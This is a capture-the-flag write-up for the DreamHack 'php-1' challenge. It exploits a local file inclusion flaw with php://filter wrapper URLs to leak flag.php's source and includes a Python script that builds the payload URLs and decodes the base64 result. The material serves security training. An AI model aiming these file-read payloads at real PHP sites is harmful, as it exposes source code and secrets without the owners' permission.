
[DreamHack] DreamHack Web Hacking php-1

선달 2023. 11. 2. 17:03

https://dreamhack.io/wargame/challenges/46

 


 

Challenge description

A Back Office service written in PHP.

Exploit the LFI vulnerability to obtain the flag. The flag is at /var/www/uploads/flag.php.

 

<h2>View</h2>
<pre><?php
    // ?file= is taken verbatim; empty string when absent
    $file = $_GET['file']?$_GET['file']:'';
    // blocklist: reject any value containing "flag" (any case) or ":"
    if(preg_match('/flag|:/i', $file)){
        exit('Permission denied');
    }
    // anything else is read from disk and echoed as-is: the LFI
    echo file_get_contents($file);
?>
</pre>

 

There are several files in the challenge source, but..!

the one that gives the hint is view.php.

 

Solution

A PHP site that reads or includes a user-controlled path is open to LFI (local file inclusion).

 

https://opentutorials.org/module/4291/26819

 

LFI(2) - with php wrapper - WEB1


 

In short, this site loads a file from a path supplied in the URL, in the form

{url}?page=view&file={path}

where page selects the view.php shown above and file is the path it reads.

 

http://host3.dreamhack.games:20052/?page=view&file=../uploads/flag.php

 

There is, however, a minimal protection in place, and this first attempt runs straight into it:

    if(preg_match('/flag|:/i', $file)){
        exit('Permission denied');
    }
    echo file_get_contents($file);

 

Since preg_match only asks whether the pattern matches somewhere in the value, any occurrence of the word "flag",

in upper or lower case (that is what the i modifier does), or of a ':' character,

ends in Permission denied. The ':' alternative is what keeps php:// wrappers out of the file parameter. As a defence this is weak by design: the proper fix is an allowlist that maps a fixed set of names to files, not a blocklist of substrings.

 

Now let's use the php wrapper LFI from the link above.

 

Following the lecture, I first requested

http://host3.dreamhack.games:23763/?page=php://filter/read=string.toupper/resource=/var/www/uploads/flag

and the response contained nothing but CAN YOU SEE $FLAG.

That is expected: string.toupper leaves the file valid PHP (the open tag is case-insensitive), so the include executes it and only the HTML text outside the tags, uppercased, reaches the browser; the flag is presumably assigned to a variable and never printed. Two details of the payload matter. It goes in page rather than file, because the check in view.php would reject the ':' in php:// while the code behind page performs no such check, and the resource is given without .php because that code evidently appends the extension itself.

 

This time, following the linked article, let's request

http://host3.dreamhack.games:23763/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag

instead.

 

Now the response holds the base64-encoded source of flag.php: the encoded text contains no PHP tags, so the include executes nothing and prints it verbatim.
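An offline model of the two ingredients above, written for this writeup as an added example (it is not code from the challenge, from DreamHack or from the original post): the blocklist view.php applies to file, and why the string.toupper chain shows only CAN YOU SEE $FLAG while the convert.base64-encode chain leaks the source when the result goes through an include. The host name, the DH{...} flag format and the contents of flag.php are constructed assumptions, and the model of include() is deliberately simplified (it drops the PHP blocks and keeps the surrounding text).

```python
"""Offline model of the php-1 LFI.  Added example for this writeup; not code from
the challenge, from DreamHack or from the original post.  The host, the DH{...}
flag format and the flag.php contents are constructed assumptions."""
import base64
import re
from typing import Optional

# The check view.php runs on ?file= : reject 'flag' (any case) or ':'.
BLOCKLIST = re.compile(r"flag|:", re.IGNORECASE)

# Constructed stand-in for /var/www/uploads/flag.php (the real file is not shown
# in the writeup).  Only the text outside the PHP tags reaches the browser.
SAMPLE_FLAG_PHP = (
    '<?php\n'
    '  $flag = "DH{constructed_sample_flag}";\n'
    '?>\n'
    'Can you see $flag?\n'
)


def file_param_blocked(value: str) -> bool:
    """True when view.php would answer 'Permission denied' for this ?file= value."""
    return BLOCKLIST.search(value) is not None


def filter_url(host: str, resource: str, chain: str) -> str:
    """Build the ?page= payload from the writeup.  The code handling ?page= is
    not subject to the blocklist (so ':' is fine) and evidently appends '.php',
    which is why the resource is passed without its extension."""
    return f"{host}/?page=php://filter/{chain}/resource={resource}"


def apply_filter(source: str, chain: str) -> str:
    """What the php://filter chain hands to include(): the transformed file."""
    if chain == "read=string.toupper":
        return source.upper()
    if chain == "convert.base64-encode":
        return base64.b64encode(source.encode()).decode()
    raise ValueError(f"unsupported chain: {chain}")


def render_included(text: str) -> str:
    """Simplified model of include(): PHP executes the <?php ... ?> blocks (which
    in the sample only assign a variable and print nothing) and emits the rest.
    With no PHP tags present, the whole text is emitted unchanged."""
    return re.sub(r"<\?(?:php)?.*?\?>", "", text, flags=re.IGNORECASE | re.DOTALL)


def decode_source(body: str) -> str:
    """Recover the original file from a response that embeds the base64 blob
    among other HTML: take the longest base64-looking run and decode it."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 payload found in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


def find_flag(text: str) -> Optional[str]:
    """Pull a DH{...} flag out of text, or None if there is none."""
    m = re.search(r"DH\{[^}]*\}", text)
    return m.group(0) if m else None


if __name__ == "__main__":
    host = "http://host3.dreamhack.games:23763"  # constructed; same form as the writeup
    for v in ("../uploads/flag.php",
              "php://filter/convert.base64-encode/resource=/var/www/uploads/flag",
              "../uploads/index.php"):
        print(f"file={v!r}: blocked={file_param_blocked(v)}")

    # string.toupper: the uppercased file is still valid PHP, so it executes.
    upper = render_included(apply_filter(SAMPLE_FLAG_PHP, "read=string.toupper"))
    print(filter_url(host, "/var/www/uploads/flag", "read=string.toupper"))
    print("  shows:", upper.strip())                       # CAN YOU SEE $FLAG?

    # base64: no PHP tags survive, so include() prints the encoded source.
    body = "<h1>Index</h1>" + render_included(apply_filter(SAMPLE_FLAG_PHP, "convert.base64-encode"))
    print(filter_url(host, "/var/www/uploads/flag", "convert.base64-encode"))
    print("  decodes to:", find_flag(decode_source(body)))  # DH{constructed_sample_flag}
```

Running it prints which file values the blocklist rejects (both the plain flag.php path and any php:// wrapper), then shows that the uppercased file still renders as CAN YOU SEE $FLAG? while the base64 response decodes back to the full source with the flag in it.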

 

https://www.base64decode.org/

 


 

Decode it and the source of flag.php comes out, flag included.

 

 

Done.
